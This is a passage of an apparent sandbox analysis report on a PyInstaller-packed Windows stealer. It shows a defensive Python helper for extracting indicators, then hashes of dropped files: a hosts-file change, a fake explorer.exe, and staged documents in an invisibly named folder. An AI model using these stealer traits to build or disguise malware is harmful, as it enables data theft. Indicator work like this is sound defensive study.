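    shared-service addresses, so the domains are what to alert on; IPs are context."""
    domains, endpoints = set(), set()
    for r in (parse_row(l) for l in lines):
        if label(r) in MALWARE_LABELS:
            domains.add(r["domain"])
            if r["proto"] == "tcp":
                endpoints.add(f"{r['ip']}:{r['port']}")
    return {"domains": sorted(domains), "tcp_endpoints": sorted(endpoints)}


if __name__ == "__main__":
    for name, n in sorted(summarize(SAMPLE_ROWS).items()):
        print(f"{name:28s} {n}")
    print("resolved but never contacted:", dns_only_domains(SAMPLE_ROWS))
    print("indicators:", ioc_candidates(SAMPLE_ROWS))
```

Run against the full table, the same functions show the stealer's lookup sequence repeating three times (one per PyInstaller extraction directory listed under Files), which is a stronger indicator than any single destination.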

Files

memory/1816-0-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\zyron.exe 

MD5 6b9890a680fb22f32d8318ca466145ad
SHA1 69380599cb62403138660cb08c59ece67dc3d388
SHA256 00a2dcab663ed13d838b665b3db093bcc44c610399148a9f643c044c1f90aca9
SHA512 565ce693948c92741c94793e82625bc92c42c407d496519205f475b12131d55e224b21571c0c173507a2a2a4382d2b4d2c0e4a3ad7cba374fa82d79001e5058c

C:\Users\Admin\AppData\Local\Temp\_MEI48802\python312.dll

MD5 2f1072ddd9a88629205e7434ed055b3e
SHA1 20da3188dabe3d5fa33b46bfe671e713e6fa3056
SHA256 d086257a6b36047f35202266c8eb8c1225163bd96b064d31b80f0dbe13da2acf
SHA512 d8dddc30733811ed9a9c4ae83ac8f3fc4d8ba3fa8051d95242fbd432fd5bf24122373ac5eea9fec78f0daf7c1133365f519a13cf3f105636da74820a00a25e9b

C:\Users\Admin\AppData\Local\Temp\_MEI48802\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

memory/1548-35-0x00007FFF98680000-0x00007FFF98D58000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI48802\_ctypes.pyd

MD5 1b06133298f03ff20e5d31cb3b0bca63
SHA1 0678e26f8d03e2ea0ba8d78d6d14809914d9c0a8
SHA256 e92c373cc790a5411681a78ade2b75ecb03f3cf17aab7d98c0fb3afa2254684d
SHA512 18c50a5ff69c0c7e19c27039eda0cade0e8bc8d617cca4bc8981dc8a519fa86a05a86b0662aaa493604e9801edf6a41ee65336332b715188e5e17a60a8154cbc

C:\Users\Admin\AppData\Local\Temp\_MEI48802\libffi-8.dll

MD5 08b000c3d990bc018fcb91a1e175e06e
SHA1 bd0ce09bb3414d11c91316113c2becfff0862d0d
SHA256 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece
SHA512 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

C:\Users\Admin\AppData\Local\Temp\_MEI48802\_ssl.pyd

MD5 7b0d6d717535bc48f0176fd6455a133b
SHA1 a3fd5e6495d961eeaa66ccb7b2a8135812210356
SHA256 3e2d13bda93c59fdd1b9bbb2b30c682774e8da4503248e96e0e3c1b0fe588ce7
SHA512 861443c982a821f61bd971f57f65998366f325d084f21636e38f91aaaac752e7dc2b2344f414db3cb7fddec08210cfc197c1815a44e9b726ff5eabe2c62f42f9

memory/1548-58-0x00007FFFB07F0000-0x00007FFFB07FF000-memory.dmp

memory/1548-57-0x00007FFFA83E0000-0x00007FFFA8405000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI48802\_sqlite3.pyd

MD5 a045491faa0cba94b3230b254db7f2d2
SHA1 11a87b7f872e24bab0b278bd88c514b5788975b1
SHA256 79769e9318b6e525a145293affedc97b5e7a2e994c88f9df445b887df75f92ee
SHA512 a279306e78f34feed13dedd7ecedd226304d5f06746a14c0f9759a7191953de6409b244d23629b25fe9c4a374528ffc6ac92bd1090e218ee5962815491fdcb43

C:\Users\Admin\AppData\Local\Temp\_MEI48802\_socket.pyd

MD5 cd2becb9c6dc5cc632509da8cbd0b15d
SHA1 28a705e779ed0e40651875cb62fa8e07d3e27e10
SHA256 2a56f2fdbd69a386924d2c00266f1a57954e09c9eb022280be713d0c6ef805ce
SHA512 fb22b719d4db4c50ab11984ba1bef29a2154d3f2a283b9fa407fd5ec079b67bedf188d5bb94b45b3d18e9000dce11ebf8bb3cd35d465ccbe49c54e150d21a62a

C:\Users\Admin\AppData\Local\Temp\_MEI48802\_queue.pyd

MD5 a56e79b7526129f06c4feacf1f8ed117
SHA1 99f4b0e65c01604f1f5beaff1c0549b1c5a807c5
SHA256 dff778a28f75ea484a8e2e91c31235eb8d44128f5ace83491e4fbe923addffad
SHA512 b1f1fee24e1041424e5e05e2087440a6b9eb79ab57367d6f83fa83c6a39c7eb693d6edac9a7ac1c22a26109014fb4a12ef31b33775b23e857afeca777ae0bbcb

C:\Users\Admin\AppData\Local\Temp\_MEI48802\_lzma.pyd

MD5 cf374ecc905c5694986c772d7fc15276
SHA1 a0ee612388a1c68013f5e954e9280ba0db1bd223
SHA256 d94c8b2004a570d0f3b1cfd0333e4b1a82696fe199a1614d9054f8bfef4ba044
SHA512 0074b3e365782721de8d0a6ee4aa43871d9498eae07a24443b84b755fa00ec3335e42aedeefed0499e642bde9f4ad08843f36b97e095ef212ec29db022676a42

C:\Users\Admin\AppData\Local\Temp\_MEI48802\_hashlib.pyd

MD5 ee8c405267c3baaa133e2e8d13b28893
SHA1 b048112268f8300b3e47e441c346dea35e55d52a
SHA256 462b55ca1a405cf11a20798cf38873a328d3720bbd9e46242ce40a5bc82f47d1
SHA512 da290e352fa759414bbfa84d1c213be9c5722f5b43ab36ae72ea816e792a04e9aaa5253b935d6acdc34611f0ef17c2c0e8d181d014ce3cb117b5775e406f820a

C:\Users\Admin\AppData\Local\Temp\_MEI48802\_decimal.pyd

MD5 a6102e46e07e1219f90392d1d89ac4d6
SHA1 425375d377fde63532aa567978c58a1f131a41b1
SHA256 572116a1ecdc809846f22d3ccd432326a7cff84969aa0de5a44e1fbe4c02bcf7
SHA512 27bad2fd9b9953798b21602f942228aae6cec23cac1c160a45c4a321f1d0151ce245a82cceb65bfcd7412b212cb19e44fff3b045d7f3bedac49ff92d1c4affa6

C:\Users\Admin\AppData\Local\Temp\_MEI48802\_bz2.pyd

MD5 2152fe099ca3e722a8b723ea26df66c6
SHA1 1daaaba933501949e5d0e3d3968f4279dcde617d
SHA256 41eb95b13a115594ca40eacbb73b27233b7a8f40e9dbfbc597b9f64f0a06b485
SHA512 5168f3c554ba8f6c1d923a047ca6784c106b56b8e1944113059190e2a9c19bd8722f14106ea7300ab222696e5164ee66d857b5d619328dd29bbb27943b073cf9

C:\Users\Admin\AppData\Local\Temp\_MEI48802\unicodedata.pyd

MD5 20f206b5b405d837c201b8fb443cfa5a
SHA1 f06b062505f7218d49a1ef0ea65c6212dc4105b0
SHA256 0ae76f7316506bcaa4a59f31817569129fd1baaaba89032953785dbf9f7a7242
SHA512 b36e4af96bef6b8c13d509b66c34f1cdf6ac8830267fabc13a811d7d486d938d798b32b4d195fea762ee550501002674d6681f8985318990b454a5bc5c982088

C:\Users\Admin\AppData\Local\Temp\_MEI48802\sqlite3.dll

MD5 5655f540da3e3bd91402e5e5b09a6d2f
SHA1 d44db47026b330d06fa84128fd9f0241f5752011
SHA256 aa05807dfa35d6fbe1484728110430802a791f3f8723f824696f2d6bd9c5b69a
SHA512 1205dcd5657dcc457f8d02452c47fcb2e7fee108a675aaddc9f7b82d1f2371e38080a6fa0f767524f835c544f129b6f71b2d716180d196b18a9a6dbef6c9bf03

C:\Users\Admin\AppData\Local\Temp\_MEI48802\select.pyd

MD5 79bb09417365e9b66c8fb984cbb99950
SHA1 517522dbcbefb65e37e309cb06fed86c5f946d79
SHA256 94f2bac05e32cb3791f66efb3229c932ab71bc3725a417340304219721b0d50d
SHA512 1c2129dd4d8febe2886e122868956ba6032a03b1297da095d3e9c02ab33183d964a8f790086e688b0720ab39aa1e8d0fe91fadbbe99035baf4d7cc5754de9e64

C:\Users\Admin\AppData\Local\Temp\_MEI48802\rarreg.key

MD5 4531984cad7dacf24c086830068c4abe
SHA1 fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA256 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA512 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

C:\Users\Admin\AppData\Local\Temp\_MEI48802\rar.exe

MD5 9c223575ae5b9544bc3d69ac6364f75e
SHA1 8a1cb5ee02c742e937febc57609ac312247ba386
SHA256 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA512 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

C:\Users\Admin\AppData\Local\Temp\_MEI48802\libssl-3.dll

MD5 6eda5a055b164e5e798429dcd94f5b88
SHA1 2c5494379d1efe6b0a101801e09f10a7cb82dbe9
SHA256 377da6175c8a3815d164561350ae1df22e024bc84c55ae5d2583b51dfd0a19a8
SHA512 74283b4051751f9e4fd0f4b92ca4b953226c155fe4730d737d7ce41a563d6f212da770e96506d1713d8327d6fef94bae4528336ebcfb07e779de0e0f0cb31f2e

C:\Users\Admin\AppData\Local\Temp\_MEI48802\libcrypto-3.dll

MD5 27515b5bb912701abb4dfad186b1da1f
SHA1 3fcc7e9c909b8d46a2566fb3b1405a1c1e54d411
SHA256 fe80bd2568f8628032921fe7107bd611257ff64c679c6386ef24ba25271b348a
SHA512 087dfdede2a2e6edb3131f4fde2c4df25161bee9578247ce5ec2bce03e17834898eb8d18d1c694e4a8c5554ad41392d957e750239d3684a51a19993d3f32613c

C:\Users\Admin\AppData\Local\Temp\_MEI48802\blank.aes

MD5 7ce138b2c0b8689475c61d3fa5ece79a
SHA1 70d12f62b136392be850260059a2db6a97e3da58
SHA256 8a4badcec2c7ec8379068eac2711228992745be2effc8b6fa212a1e8d315bfcc
SHA512 6f7a66cfcb860f92b74c4bbc50285a20d6cf14399eae345ca8ccf1fae4377d4f618e6634ba337e1e4e7de21c6b34af589ce8b16293ef85780797c70357122cfb

C:\Users\Admin\AppData\Local\Temp\_MEI48802\base_library.zip

MD5 ccee0ea5ba04aa4fcb1d5a19e976b54f
SHA1 f7a31b2223f1579da1418f8bfe679ad5cb8a58f5
SHA256 eeb7f0b3e56b03454868411d5f62f23c1832c27270cee551b9ca7d9d10106b29
SHA512 4f29ac5df211fef941bd953c2d34cb0c769fb78475494746cb584790d9497c02be35322b0c8f5c14fe88d4dd722733eda12496db7a1200224a014043f7d59166

memory/1548-64-0x00007FFFA4540000-0x00007FFFA456D000-memory.dmp

memory/1548-67-0x00007FFFAB820000-0x00007FFFAB839000-memory.dmp

memory/1548-68-0x00007FFFA4510000-0x00007FFFA4534000-memory.dmp

memory/1548-70-0x00007FFF98150000-0x00007FFF982C6000-memory.dmp

memory/1548-74-0x00007FFFA82B0000-0x00007FFFA82BD000-memory.dmp

memory/1548-73-0x00007FFFA7A50000-0x00007FFFA7A69000-memory.dmp

memory/1548-76-0x00007FFFA44D0000-0x00007FFFA4503000-memory.dmp

memory/1548-80-0x00007FFF98080000-0x00007FFF9814D000-memory.dmp

memory/1548-81-0x00007FFF97B50000-0x00007FFF98072000-memory.dmp

memory/1548-82-0x000001D38BB20000-0x000001D38C042000-memory.dmp

memory/1548-84-0x00007FFFA5DE0000-0x00007FFFA5DF4000-memory.dmp

memory/1548-86-0x00007FFFA8190000-0x00007FFFA819D000-memory.dmp

memory/1548-88-0x00007FFF98680000-0x00007FFF98D58000-memory.dmp

memory/1548-89-0x00007FFF97A30000-0x00007FFF97B4B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j1vxgdyt.jdr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3232-96-0x000001287F8A0000-0x000001287F8C2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d28a889fd956d5cb3accfbaf1143eb6f
SHA1 157ba54b365341f8ff06707d996b3635da8446f7
SHA256 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA512 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

memory/1548-191-0x00007FFFA83E0000-0x00007FFFA8405000-memory.dmp

C:\Windows\System32\drivers\etc\hosts

MD5 f99e42cdd8b2f9f1a3c062fe9cf6e131
SHA1 e32bdcab8da0e3cdafb6e3876763cee002ab7307
SHA256 a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0
SHA512 c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

\??\c:\Users\Admin\AppData\Local\Temp\cj3lxvzi\cj3lxvzi.cmdline

MD5 a1b2375f1e0a525201b6d2d601f7d928
SHA1 345ff5eadb0149d47f01d9d9a0b00bb80f0b239e
SHA256 aefaf547ad0efc8d88c13f718516d8d4f88bf4bbb81365d7b92ce0f792126658
SHA512 15ba49c80c3e6528026c8e2b0d1649cae13a4bf7d956dc12bbc5524d5dfa41b5ec63a259bcbeead4dcf4700c0a4dba46644f33751b17c986c1008d17753c3955

\??\c:\Users\Admin\AppData\Local\Temp\cj3lxvzi\cj3lxvzi.0.cs

MD5 c76055a0388b713a1eabe16130684dc3
SHA1 ee11e84cf41d8a43340f7102e17660072906c402
SHA256 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA512 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

\??\c:\Users\Admin\AppData\Local\Temp\cj3lxvzi\CSCD8E5FF1D5B2B4571A40C33BB0E7D381.TMP

MD5 fdbc68b48da7c5ce738744fd9fd2c66e
SHA1 ba94849ad91cdc3b1db64b592402c3bb121556cb
SHA256 7e1966ae96052d0b31ecba018f87b309c7ebad77e16d983ffff51e04860e6273
SHA512 90d3e4c625cb78adb3e6fda210d03e82aa4aab8f73f28a0e4ce53273e7a0f414be32413b5f6c4cb2e01ea4c204fe8bc25b22bac3d27a3d99bce476c4539ee778

C:\Users\Admin\AppData\Local\Temp\RES8666.tmp

MD5 bfda36bb9b12b7a8a30f90e37f9e1cda
SHA1 0bfd602c1bce63f5d63bbf7e6cd00b1ce07691df
SHA256 07c7d9685ffae5640372d87fa263b86d6bc6ceebb78e9dae688984b77d5a3cf9
SHA512 0590a0cb1d4946f1e05bf3707c3a46a2149b86728b1ee907891fea813aa2c55094e0730bfabf4b289352dcccf27d7957da4802988bbb176db27c553c33a9a65b

C:\Users\Admin\AppData\Local\Temp\cj3lxvzi\cj3lxvzi.dll

MD5 28f10385588f24ab83ac563f95ba31c5
SHA1 e0c47216dfa55f34a2943cf561d3f226e94ff4ba
SHA256 85c2b6feb48fbdcc5c1954700031b48b3ae238d19421c37f1dc23810c75f2943
SHA512 281ecbdf0483c9328ca4e8c0740327d698051f2bb3cafcde5081262ffa6808351eac3626d39dd7a515075d8bc03ab9c7953dac5e9b05d87825631cb36a935386

memory/3816-211-0x000001435F1E0000-0x000001435F1E8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e2efbfd23e33d8d07d019bdd9ca20649
SHA1 68d3b285c423d311bdf8dc53354f5f4000caf386
SHA256 f4386e3a103dafd6e85bebc2ad649069d168b4da8a0ded51b3ec96fa1408a828
SHA512 b7a961002557ff2efb785f756c9347e250392eab3dcb5168c67e89238e85368a41d0a5bdc94bfbbc192ba427c83e982234b3cf8824b166a69973f3f9df177443

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9192804218d4c7beed236c755efeb927
SHA1 7cdd473f86179dcead44fe88b03e54a6026d1348
SHA256 5d285e5f9d806d18a08b2b550a9dfd01633835256999efdcdd74de04cdb89209
SHA512 edebd9e697ffce29d2057240f6bf20a443b521d8270bf1bcfdb2f8650b3b8e394bcb79c6af7440b04da858873c12ca12131011464cf3f436c805a7a0e11a92b2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 88be3bc8a7f90e3953298c0fdbec4d72
SHA1 f4969784ad421cc80ef45608727aacd0f6bf2e4b
SHA256 533c8470b41084e40c5660569ebbdb7496520d449629a235e8053e84025f348a
SHA512 4fce64e2dacddbc03314048fef1ce356ee2647c14733da121c23c65507eeb8d721d6b690ad5463319b364dc4fa95904ad6ab096907f32918e3406ef438a6ef7c

C:\Users\Admin\AppData\Local\Temp\‍​ ‏   ‍​ \Common Files\Desktop\CopyOpen.mp4

MD5 df9784a975a0030f3a2c94fe34edda01
SHA1 421d579c9758fc70d754ab5c6beca2453ca9dd8f
SHA256 de9e93ecfdabc55dd1b08717c0e28d87cb17faac720458335377723bf4b560fe
SHA512 07966319021cbbca80dce24b2e4fdd11696e360663a2134ec933f853d908a535c22d047174fa907cf96498648035f114bb5a47e8564b03782164f08d3c8fcc2d

C:\Users\Admin\AppData\Local\Temp\‍​ ‏   ‍​ \Common Files\Desktop\GrantCompress.mp3

MD5 ad52bea734e7f0e2f5fae339500260d8
SHA1 78db253d00a197d06abc07b4452fd36c66a8e2f9
SHA256 6c6278f748fe1a1fe1c23d7405fd24883753c6ccbf66dfffd41708a995cf79e1
SHA512 1e8b50885ff428d1c39e255a0b703181899cfdcd3b824668af270ebfe62efa414de8519f1123ef6afdc5b78c5a469b4ad4b11dc979fb6b6047b24201175a98d1

C:\Users\Admin\AppData\Local\Temp\‍​ ‏   ‍​ \Common Files\Desktop\RegisterUpdate.xls

MD5 644ef7870c885f12d184acbd6bc1c99e
SHA1 aacd10bcd700420aa2e5529655ca71665c64859d
SHA256 d6435d3bc681c24e863178b3c4d339a5194ecfc84caccf54ac42a74ee444e95a
SHA512 674f85e0ce8373f39f6c612bbe05ff6b7819d1fc4c979ae0fe898700b377162dd0a34c02ac38cc6b686bfe483acc8d7760a954145873ec8ea58eef8157a1e32c

C:\Users\Admin\AppData\Local\Temp\‍​ ‏   ‍​ \Common Files\Documents\DisconnectAssert.xls

MD5 9b666b8e29876fba0ff6e9362c69d99f
SHA1 2fa3bb9e1f1b2e7d3152566b7a2be2541add5098
SHA256 fd0aabd571e9189fd2dfd35ab8f46cb1b1651489f7f9fd7bbaf1981ef7b6419e
SHA512 82b0b7a1ed0fe9c90e0b7a829c9d15dc91815b5ac2f55bf3458fc053fa4b309330046ed070580333c5953127f26f8a9f58de2f69cd8f015e63f1fa3fe64e4720

C:\Users\Admin\AppData\Local\Temp\‍​ ‏   ‍​ \Common Files\Documents\Are.docx

MD5 a33e5b189842c5867f46566bdbf7a095
SHA1 e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA256 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512 f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

C:\Users\Admin\AppData\Local\Temp\‍​ ‏   ‍​ \Common Files\Documents\Files.docx

MD5 4a8fbd593a733fc669169d614021185b
SHA1 166e66575715d4c52bcb471c09bdbc5a9bb2f615
SHA256 714cd32f8edacb3befbfc4b17db5b6eb05c2c8936e3bae14ea25a6050d88ae42
SHA512 6b2ebbbc34cd821fd9b3d7711d9cdadd8736412227e191883e5df19068f8118b7c80248eb61cc0a2f785a4153871a6003d79de934254b2c74c33b284c507a33b

C:\Users\Admin\AppData\Local\Temp\‍​ ‏   ‍​ \Common Files\Documents\GetWrite.docx

MD5 75da4b4b166a30c18bfeff27aad79533
SHA1 6dc184581ba99a605e01cc5b59e7972586a586b6
SHA256 248377157913a82a4a20ba92dac2dcab367c45ac31e90012a6315209517622a6
SHA512 648bf6a7b0eb3bae8ac3ed8c251b228686bc0097201d8b50b491f0b91a44ed6766354c8ad2f37f2d7c40c555a25eec4a426691a25fc419db0022c51a5b6add07

C:\Users\Admin\AppData\Local\Temp\‍​ ‏   ‍​ \Common Files\Documents\InvokeImport.txt

MD5 fc6c5309eb2b858fb5a8fb7828f6aadb
SHA1 c953ef9b4d276d826d5868a60ccdf127bc85d5a8
SHA256 2e13924534c0fe2b08bbb6f2b593363b7830c65a736a61e224e2b170616ed4df
SHA512 e7368be4020ff60e7e9074d72fdaa5b81902bb91f97e655ef58748e98c14e848bdceadbf6bbd7b082e9e848c1e8afcadff05fe711cc0f4946d5aface6e133de2

C:\Users\Admin\AppData\Local\Temp\‍​ ‏   ‍​ \Common Files\Documents\Opened.docx

MD5 bfbc1a403197ac8cfc95638c2da2cf0e
SHA1 634658f4dd9747e87fa540f5ba47e218acfc8af2
SHA256 272ed278e82c84cf4f80f48ec7989e1fc35f2055d6d05b63c8a31880846597a6
SHA512 b8938526fcbf7152805aec130ca553e3ec949cb825430a5d0a25c90ec5eb0863857010484a4b31fdc4bb65a4c92ad7127c812b93114be4569a677f60debe43b1

memory/1548-292-0x00007FFF98680000-0x00007FFF98D58000-memory.dmp

memory/3448-311-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1548-310-0x00007FFFA4510000-0x00007FFFA4534000-memory.dmp

memory/1548-303-0x00007FFF97B50000-0x00007FFF98072000-memory.dmp

memory/1548-302-0x00007FFF98080000-0x00007FFF9814D000-memory.dmp

memory/1548-301-0x00007FFFA44D0000-0x00007FFFA4503000-memory.dmp

memory/1548-300-0x00007FFFA82B0000-0x00007FFFA82BD000-memory.dmp

memory/1548-298-0x00007FFF98150000-0x00007FFF982C6000-memory.dmp

memory/1548-293-0x00007FFFA83E0000-0x00007FFFA8405000-memory.dmp

C:\Windows\Resources\Themes\explorer.exe

MD5 4fd2e8e9f2576df6d1be8b79f5252131
SHA1 fdb58749c2d24c163af7c3954f44352b8960fcad
SHA256 36b8a4bc10a95fa487f8b10f27c5c7f17b200d13e8a6ce66746097c618419358
SHA512 f395aa8bb1fa4806dd584a919453c0ca842657f83b6e23df42c329cfd41d20fb6b5440f0d11049904ae9dd7bb4a3c37061e787b410e3c09ddc1b55f5f603ad28

memory/2968-315-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4628-325-0x0000000000400000-0x000000000041F000-memory.dmp

memory/688-337-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1548-336-0x000001D38BB20000-0x000001D38C042000-memory.dmp

memory/4628-338-0x0000000000400000-0x000000000041F000-memory.dmp

memory/3448-339-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1816-340-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1548-375-0x00007FFF97A30000-0x00007FFF97B4B000-memory.dmp

memory/1548-376-0x00007FFFA5DE0000-0x00007FFFA5DF4000-memory.dmp

memory/1548-383-0x00007FFF98150000-0x00007FFF982C6000-memory.dmp

memory/1548-382-0x00007FFFA4510000-0x00007FFFA4534000-memory.dmp

memory/1548-381-0x00007FFFAB820000-0x00007FFFAB839000-memory.dmp

memory/1548-380-0x00007FFFA4540000-0x00007FFFA456D000-memory.dmp

memory/1548-379-0x00007FFFB07F0000-0x00007FFFB07FF000-memory.dmp

memory/1548-378-0x00007FFFA83E0000-0x00007FFFA8405000-memory.dmp

memory/1548-377-0x00007FFF98680000-0x00007FFF98D58000-memory.dmp

memory/1548-372-0x00007FFF97B50000-0x00007FFF98072000-memory.dmp

memory/1548-371-0x00007FFF98080000-0x00007FFF9814D000-memory.dmp

memory/1548-370-0x00007FFFA44D0000-0x00007FFFA4503000-memory.dmp

memory/1548-369-0x00007FFFA82B0000-0x00007FFFA82BD000-memory.dmp

memory/1548-374-0x00007FFFA8190000-0x00007FFFA819D000-memory.dmp

memory/1548-368-0x00007FFFA7A50000-0x00007FFFA7A69000-memory.dmp

memory/1548-384-0x000001D38BB20000-0x000001D38C042000-memory.dmp

memory/3516-412-0x00007FFF969B0000-0x00007FFF97088000-memory.dmp

memory/3516-414-0x00007FFFA89E0000-0x00007FFFA89EF000-memory.dmp

memory/3516-413-0x00007FFFA8610000-0x00007FFFA8635000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI50802\blank.aes

MD5 381ecca5e096640bfd9c4f273afee3f2
SHA1 9a7c337888373c271f1c1259dcf8a0dd28bcc094
SHA256 fb80233aa4b06342a0fe13adcf4227a2034d59832cec60cc6b1f46d290cf1d35
SHA512 47c068a341471c763f9552ae670d3ab3764a1cc917b7bdb6fd3b52775f64671cf9392aa84cde927dcf85d24a292a53d654c36ce9b75bc3e0d7377915663de3a2

memory/3516-419-0x00007FFF98570000-0x00007FFF9859D000-memory.dmp

memory/3516-421-0x00007FFF98540000-0x00007FFF98564000-memory.dmp

memory/3516-422-0x00007FFF96830000-0x00007FFF969A6000-memory.dmp

memory/3516-420-0x00007FFFA5DE0000-0x00007FFFA5DF9000-memory.dmp

memory/3516-423-0x00007FFF98FE0000-0x00007FFF98FF9000-memory.dmp

memory/3516-424-0x00007FFFA8600000-0x00007FFFA860D000-memory.dmp

memory/3516-425-0x00007FFF981B0000-0x00007FFF981E3000-memory.dmp

memory/3516-427-0x00007FFF95A50000-0x00007FFF95F72000-memory.dmp

memory/3516-428-0x00000131DCDA0000-0x00000131DD2C2000-memory.dmp

memory/3516-426-0x00007FFF980E0000-0x00007FFF981AD000-memory.dmp

memory/3516-430-0x00007FFFA82B0000-0x00007FFFA82BD000-memory.dmp

memory/3516-429-0x00007FFF98940000-0x00007FFF98954000-memory.dmp

memory/3516-431-0x00007FFF96710000-0x00007FFF9682B000-memory.dmp

memory/5432-541-0x00000254C77D0000-0x00000254C77D8000-memory.dmp

memory/3516-552-0x00007FFF969B0000-0x00007FFF97088000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\yTxoWzLrRw.tmp

MD5 49693267e0adbcd119f9f5e02adf3a80
SHA1 3ba3d7f89b8ad195ca82c92737e960e1f2b349df
SHA256 d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f
SHA512 b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

C:\Users\Admin\AppData\Local\Temp\BZuy8bjjGD.tmp

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

C:\Users\Admin\AppData\Local\Temp\o6RxEXC0WX.tmp

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

C:\Users\Admin\AppData\Local\Temp\glsAcjdyTA.tmp

MD5 9618e15b04a4ddb39ed6c496575f6f95
SHA1 1c28f8750e5555776b3c80b187c5d15a443a7412
SHA256 a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab
SHA512 f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26

C:\Users\Admin\AppData\Local\Temp\JNp0h3BcDA.tmp

MD5 42c395b8db48b6ce3d34c301d1eba9d5
SHA1 b7cfa3de344814bec105391663c0df4a74310996
SHA256 5644546ecefc6786c7be5b1a89e935e640963ccd34b130f21baab9370cb9055d
SHA512 7b9214db96e9bec8745b4161a41c4c0520cdda9950f0cd3f12c7744227a25d639d07c0dd68b552cf1e032181c2e4f8297747f27bad6c7447b0f415a86bd82845

C:\Users\Admin\AppData\Local\Temp\nJArpaTbyI.tmp

MD5 8f5942354d3809f865f9767eddf51314
SHA1 20be11c0d42fc0cef53931ea9152b55082d1a11e
